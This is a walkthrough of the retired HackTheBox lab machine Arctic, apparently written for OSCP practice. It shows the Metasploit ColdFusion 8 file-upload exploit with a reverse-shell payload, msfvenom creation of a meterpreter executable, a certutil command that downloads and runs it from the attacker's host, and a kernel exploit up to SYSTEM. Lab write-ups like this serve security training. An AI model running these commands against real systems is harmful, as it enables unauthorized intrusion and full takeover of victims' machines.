Arctic HackTheBox WalkThrough
This is Arctic HackTheBox machine walkthrough and is the 7th machine of our
OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to Arctic HTB machine. Before starting let us know something about this machine. It is a
Windows machine with IP address
10.10.10.11 and difficulty
easy assigned by its maker.
NOTE: Although there are other methods to solve this box, but I rooted this box using
metasploit. To exploit this machine with metasploit you should have
patience because the
FMTP server running on this box possess a
long load time about 20-30 sec to respond back with the request. In addition, the connection from the server get lost after about 120 ping requests. You may lose your meterpreter session when the connection from the server get lost. Therefore, you have to be very fast and accurate to root this box before your session died.
This machine is currently
retired so you will require
VIP subscription at
hackthebox.eu to access this machine. Before starting, connect your PC with VPN and make sure your connectivity with Arctic machine by pinging the IP 10.10.10.11. If all goes correct then start hacking. As usual I started by scanning the machine. Used
Nmap [a popular port scanner] for this task and the result is below-
$nmap -sC -sV -oN arctic.nmap 10.10.10.11
Nmap revealed ports 135, 8500, and 49154 are open.
msrpc service on port
FMTP service on port
8500 are running. Did not know anything about FMTP service. After some googling found that, it is a Flight Message Transfer Protocol and is used to exchange information between Flight Data Processing Systems and Air Traffic Control Unit (ATCU).
Since nmap could not confirm the exact version of service on port 8500 so I tried to manually
banner grab the service on this port using
netcat. Netcat even didn’t give any information.
Then tried to google for FMTP service and port associated with it. Found this article. In its, first line it is written ‘
allow remote access as Web Server’, so I immediately go to the URL http://10.10.10.11:8500 and after 20-30 sec of wait it showed me a web page. This confirms that a web Server is running on port 8500. This web server has more loading time so you have to wait 20-30 sec to access its files.
After some enumeration found this http://10.10.10.11:8500/CFIDE/administrator/ URL. It revealed that
Adobe ColdFusion 8 is using this port.
Soon I get any service and its version I immediately search for exploit using
searchsploit (an exploit-db querying tool).
Searchsploit listed many numbers of potential exploits and most of them are of XSS. There are also two exploits whose metasploit module is present, so I grepped them. One is for
Directory Traversal and other is for
Arbitrary File Upload.
Searching for exploit
$searchsploit coldfusion 8 | grep Metasploit
Tried second one because it could give us the shell and I was able to get user shell easily. Let us exploit the vulnerability to get user shell.
Getting User Shell
msf5 > search coldfusion
msf5 > use exploit/windows/http/coldfusion_fckeditor
msf5 exploit(windows/http/coldfusion_fckeditor) > set RHOSTS 10.10.10.11
msf5 exploit(windows/http/coldfusion_fckeditor) > set RPORT 8500
smsf5 exploit(windows/http/coldfusion_fckeditor) > set PAYLOAD java/jsp_shell_reverse_tcp
msf5 exploit(windows/http/coldfusion_fckeditor) > set LHOST 10.10.14.6
msf5 exploit(windows/http/coldfusion_fckeditor) > set HTTPCLIENTTIMEOUT 150
msf5 exploit(windows/http/coldfusion_fckeditor) > exploit
If you are getting
upload error then increase
HTTPCLIENTTIMEOUT to more than
150 sec. Moreover, if do not get shell in one attempt try to run it twice or thrice. In addition, you have to wait for 3 to 4 min after the shell is open because server respond very slowly. I have also used a metasploit advanced option
HTTPCLIENTTIMEOUT since we know that the server respond very slowly.
We successfully have got user shell. Let us capture the user flag.
Capture User Flag
For privilege escalation, we have to first find a
PrivEsc vector using which we can perform privilege escalation. Soon I get low privilege windows shell I run command
systeminfo to get information about
windows and about the
hotfixes (patches) installed to this OS. If no hotfix is present then I definitely search for some kernel exploits using
exploit suggester. When I ran
$systeminfo command in arctic box it revealed that it has no hotfix installed into it. In addition, its OS version
6.1.7600 also appears to be vulnerable according to my knowledge.
Right now, we are in a shell from metasploit so
CTRL+Z will background the shell and then we can use module
multi/recon/local_exploit_suggester to list all the possible kernel exploits. But, when I press
CTRL+Z it don’t take me to the meterpreter shell instead it completely closes msfconsole. This is because we have not used meterpreter payload while executing ColdFusion exploit. To run
local_exploit_suggester we have to anyhow, upgrade the shell to meterpreter shell.
Upgrading Shell to Meterpreter Shell
To upgrade the shell to meterpreter shell I did the following things
1. First of all got a shell using the
ColdFusion exploit, which we have already done.
2. Created a msfvenom payload named
shell.exe using a 64-bit meterpreter payload.
python web server locally to host this payload
4. Started a
listener in msfconsole
5. Changed the directory to
C:\Windows\Tasks\ (which is public writeable directory in windows OS) in arctic machine
6. Downloaded the payload on arctic
7. Executed the payload shell.exe
Ran the following commands:-
On Kali Machine
In window 1:
$msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=4321 -a x64 -f exe >shell.exe
$python3 -m http.server 80
In Window 2:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.6
msf5 exploit(multi/handler) > set LPORT 4321
msf5 exploit(multi/handler) > exploit
meterpreter > sysinfo // After getting shell
On Arctic Machine
$certutil.exe -urlcache -split -f "http://10.10.14.6/shell.exe" shell.exe
We have got a meterpreter shell. Now we can run our post exploitation module.
Finding PrivEsc Vector
meterpreter > run multi/recon/local_exploit_suggester
local_exploit_suggester module found 5 kernel exploits that can be used to escalate privilege. I tried each of them but only
windows/local/ms16_014_wmi_recv_notif module worked. So here, our PrivEsc vector is
Kernel Exploit. Let us escalate privilege and get admin shell.
Getting Root Shell
meterpreter > background
msf5 exploit(multi/handler) > use windows/local/ms16_014_wmi_recv_notif
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set LHOST 10.10.14.6
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > exploit
meterpreter > getuid
NT AUTHORITY\SYSTEM now which is the highest privilege in the windows OS.
Capture Root Flag
This was how I rooted Arctic HackTheBox machine. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. For any suggestion and query related to walkthrough, feel free to contact us at [email protected].
Next retired HackTheBox machine WalkThrough is Cronos.